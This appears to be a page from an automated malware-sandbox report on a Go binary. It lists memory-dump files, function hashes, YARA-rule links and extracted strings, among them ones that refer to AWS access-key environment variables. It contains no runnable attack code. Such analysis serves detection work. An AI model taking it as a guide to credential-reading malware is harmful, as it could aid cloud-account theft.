Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: "$/$attempted to trace a bad status for a goroutineattempting to link in too many shared librariesunable to get usable HTTP transport from clientRtlDosPathNameToRelativeNtPathName_U_WithStatusbufio: reader returned negative count from Readreflect.Value.Bytes of un$runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFileP
API String ID: 0-1775125088
Opcode ID: c6e9fc29fccbaf39dd5fa565dc506cfd6cbf125ffb58ae4eaf5bb68d541b8825
Instruction ID: 2baaedeb8118bf1d6d3a2fed3ddd99c02289493e1f6ae83e9b1f164f86783616
Opcode Fuzzy Hash: c6e9fc29fccbaf39dd5fa565dc506cfd6cbf125ffb58ae4eaf5bb68d541b8825
Instruction Fuzzy Hash: FC4198B45483458FC304EF65C094A5AFBE0BF89754F90896EE9D883352D7B8A948CF93

Function 00B17450 Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

runtime: failed to create new OS thread (have runtime: panic before malloc heap initializedstopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executionruntime: name offset base pointer out of rangeruntime: type offset base poin, xrefs: 00B174F0
., xrefs: 00B174F9
runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec , xrefs: 00B17564
already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobje, xrefs: 00B1751F

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobje$.$runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec $runtime: failed to create new OS thread (have runtime: panic before malloc heap initializedstopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executionruntime: name offset base pointer out of rangeruntime: type offset base poin
API String ID: 0-4153645543
Opcode ID: 7187b17ae3e29bd8d9b1a1ff228329630c5c9856f6bf21354b8c28497cbd4bfa
Instruction ID: 3353de18c773e5e24c818bc0d30cd131997bd2468bc2b752d8f86bed76e29605
Opcode Fuzzy Hash: 7187b17ae3e29bd8d9b1a1ff228329630c5c9856f6bf21354b8c28497cbd4bfa
Instruction Fuzzy Hash: BC31FEB45487049FC304EF68D5896AABBF4BF88304F40896DE888C3345EB78D988DF52

Function 00B11CD0 Relevance: 5.1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

Strings

, xrefs: 00B11D6B
, xrefs: 00B11D63
, xrefs: 00B11DB8
, xrefs: 00B11D3E

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: $ $ $
API String ID: 0-3535155489
Opcode ID: 58591d97651b8d19527e1834858c1490d28efd8f28b2492cd9c4b1034167a70e
Instruction ID: e3232cc33313f4f48142089bb637d5b745695f7a592af809b21562de0a2d85ef
Opcode Fuzzy Hash: 58591d97651b8d19527e1834858c1490d28efd8f28b2492cd9c4b1034167a70e
Instruction Fuzzy Hash: 343181746083418FD768DF28D094A5ABBE2FB89304F508C6DE59987751DB35A948CF43

Function 00B04000 Relevance: 5.1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

Strings

GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime, xrefs: 00B04095
?, xrefs: 00B040D2
GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pc, xrefs: 00B04017
malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`invalid value for environment variable, %s=%s, need true, falseclient configured for dualstack but not supported for operationlicense-manager-user-subscriptions-fips.us-east-1.amazonaws.comlicense-, xrefs: 00B040C9

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: ?$GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pc$GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime$malformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`invalid value for environment variable, %s=%s, need true, falseclient configured for dualstack but not supported for operationlicense-manager-user-subscriptions-fips.us-east-1.amazonaws.comlicense-
API String ID: 0-498767748
Opcode ID: 605c20cd0bc6bdfc28ecb46af02623a2cb1151806ca12f10f3f6529422a3b98e
Instruction ID: 8a813edac2175405fe9e4a8dcc51bee07fe4f80800c116ca88bc4fce943b5fde
Opcode Fuzzy Hash: 605c20cd0bc6bdfc28ecb46af02623a2cb1151806ca12f10f3f6529422a3b98e
Instruction Fuzzy Hash: F92138B05083058FC700EF34D19162ABBE0FF88714F80899DE59887392E7399984DB53

Function 00B066F0 Relevance: 5.1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

Strings

runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey h, xrefs: 00B06757
npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUplo, xrefs: 00B06785
", xrefs: 00B067C2
too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: c, xrefs: 00B067B9

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUplo$"$runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey h$too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: c
API String ID: 0-4281611166
Opcode ID: 991f078a20bcd8a9efee5703f6d8f4412cae757dec0be54702dcc70e4c88c3cd
Instruction ID: f05ab190b8cf82c1dc7a9ab2efbcf401a50a62e80e2c0158fe4182683798b7f1
Opcode Fuzzy Hash: 991f078a20bcd8a9efee5703f6d8f4412cae757dec0be54702dcc70e4c88c3cd
Instruction Fuzzy Hash: 54211A741497008FC304EF64D19567ABBF0EF85704F4588ADE899876A2E7349898EB63

Function 00B15950 Relevance: 5.1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

Strings

3, xrefs: 00B15A2D
runtime: netpoll: PostQueuedCompletionStatus failed (errno= runtime: GetQueuedCompletionStatusEx returned invalid mode= AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY not found in environmentreflect: call of reflect.Value.Len on ptr to non-array Valuetls: no supported ve, xrefs: 00B159DF
) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St, xrefs: 00B15A09
runtime: netpoll: PostQueuedCompletionStatus failedfatal: systemstack called from unexpected goroutinebucket name %s is not compatible with S3 Accelerategodebug: Value of name not listed in godebugs.All: crypto/tls: reserved ExportKeyingMaterial label: %stls: , xrefs: 00B15A24

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
